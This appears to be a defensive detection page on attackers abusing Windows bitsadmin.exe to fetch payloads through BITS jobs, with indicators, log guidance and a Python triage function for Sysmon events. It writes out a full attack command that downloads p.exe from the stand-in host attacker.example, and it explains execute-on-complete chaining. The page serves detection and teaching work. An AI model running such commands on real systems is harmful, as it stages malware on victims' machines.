Bitsadmin Download
Attackers abuse the signed bitsadmin.exe to queue background BITS jobs that download payloads under a trusted service, blending into normal updates.
bitsadmin.exe is a signed Windows command-line tool for creating and managing Background Intelligent Transfer Service (BITS) jobs. BITS is the same throttled, resumable transfer mechanism Windows Update and many legitimate installers use, so its traffic is expected on every host. Attackers abuse bitsadmin to queue a download job that fetches a payload over HTTP/S — the transfer is carried out by the BITS service (svchost.exe), not the attacker's process, giving a layer of indirection and persistence.
The technique is attractive because it is simple, uses a trusted Microsoft binary, survives reboots and network interruptions, and can be chained so that the file is executed once the transfer completes. Analysts encounter it during the ingress phase of an intrusion, typically launched from a script or command interpreter to pull staged tooling onto a foothold host.
How it works
The attacker creates a job, adds a remote file to it, and starts the transfer in a single command line:
bitsadmin /transfer job1 /download /priority high http://attacker.example/p.exe c:\users\public\p.exe
/transfer ... /download queues and runs the job; the source is a URL and the destination is a user-writable path. Attackers frequently set /priority high to move quickly, and may chain /SetNotifyCmdLine so BITS executes the payload itself when the job finishes — meaning the spawning parent of the malware is the BITS service, not the original script.
The recognisable indicators are bitsadmin combined with /transfer, /download, /addfile, /SetNotifyCmdLine, or /create, paired with an http/https source and an .exe/.dll/.ps1 destination in a writable directory — none of which resemble a normal Windows Update transfer the OS queues on its own.
Detection & analysis
Static analysis:
- Triage the command line with regex/YARA: bitsadmin plus /transfer, /addfile, /download, or /SetNotifyCmdLine together with a URL and an executable destination is high-signal. The presence of /SetNotifyCmdLine (execute-on-complete) is especially suspicious.
- BITS jobs are also recorded on disk and in ETW; inspect the Microsoft-Windows-Bits-Client/Operational log and the BITS state for queued jobs referencing external URLs, suspicious destinations, or a notify command line.
Dynamic analysis:
- In a sandbox, attribute the actual network fetch to the BITS service (svchost.exe hosting BITS) rather than bitsadmin.exe, then capture the URL and the dropped file. Watch for a file written to a user-writable directory followed by its execution.
- Inspect the process tree around the bitsadmin invocation. Benign use is rare interactively; malicious instances are commonly spawned by cmd.exe, powershell.exe, wscript.exe, or an Office application, and may be followed by execution of the downloaded file via the BITS notify callback.
Detection rule hint:
Alert on Sysmon Event ID 1 where Image ends with \bitsadmin.exe AND the command line contains /transfer, /addfile, /download, or /SetNotifyCmdLine (especially with an http/https source or an .exe/.dll/.ps1 destination). Correlate with the BITS-Client Operational log and with Event ID 11 (file create) under the same destination path, and treat bitsadmin spawned by a script host or Office app as anomalous.
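The rule hint above, turned into a small triage function run over constructed Sysmon Event ID 1 records. This is an added example, not the page's own tooling; the Office process names and the list of writable directories are assumptions, and the sample records are made up.

```python
import re

# Indicator lists from the page's detection rule hint.
SUSPICIOUS_SWITCHES = {"/transfer", "/addfile", "/download", "/setnotifycmdline", "/create"}
# Parents the page calls anomalous spawners (Office image names are assumed).
SCRIPT_HOST_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "winword.exe", "excel.exe"}
# Typical user-writable locations (assumed list, not from the page).
WRITABLE_HINTS = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
URL_RE = re.compile(r"^https?://", re.I)
PAYLOAD_EXT_RE = re.compile(r"\.(exe|dll|ps1)$", re.I)

def basename(path: str) -> str:
    """Last component of a Windows-style path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_sysmon_event(event: dict) -> dict:
    """Score one Sysmon Event ID 1 record: alert flag, severity and the matched indicators."""
    reasons = []
    if basename(event.get("Image", "")) != "bitsadmin.exe":
        return {"alert": False, "severity": "none", "reasons": reasons}
    tokens = event.get("CommandLine", "").split()
    hits = {t.lower() for t in tokens if t.startswith("/")} & SUSPICIOUS_SWITCHES
    if not hits:  # e.g. "bitsadmin /list" never matches the rule
        return {"alert": False, "severity": "none", "reasons": reasons}
    reasons.append("switches: " + ", ".join(sorted(hits)))
    severity = "medium"
    has_url = any(URL_RE.match(t) for t in tokens)
    if has_url:
        reasons.append("http/https source")
    # Destination = a non-URL token with a payload extension (the URL may end in .exe too).
    dests = [t for t in tokens if not URL_RE.match(t) and PAYLOAD_EXT_RE.search(t)]
    if dests:
        reasons.append("executable destination: " + dests[0])
        if any(h in dests[0].lower() for h in WRITABLE_HINTS):
            reasons.append("destination in user-writable directory")
    if "/setnotifycmdline" in hits:
        reasons.append("execute-on-complete callback set")
    if basename(event.get("ParentImage", "")) in SCRIPT_HOST_PARENTS:
        reasons.append("spawned by script host or Office app")
    if (has_url and dests) or len(reasons) >= 3:
        severity = "high"
    return {"alert": True, "severity": severity, "reasons": reasons}

# Constructed sample Sysmon records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high http://attacker.example/p.exe c:\users\public\p.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "bitsadmin /list /allusers"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p -s BITS"},
]
```

In a SIEM the same logic would be joined with the BITS-Client Operational log and Event ID 11 on the destination path, as the rule hint describes.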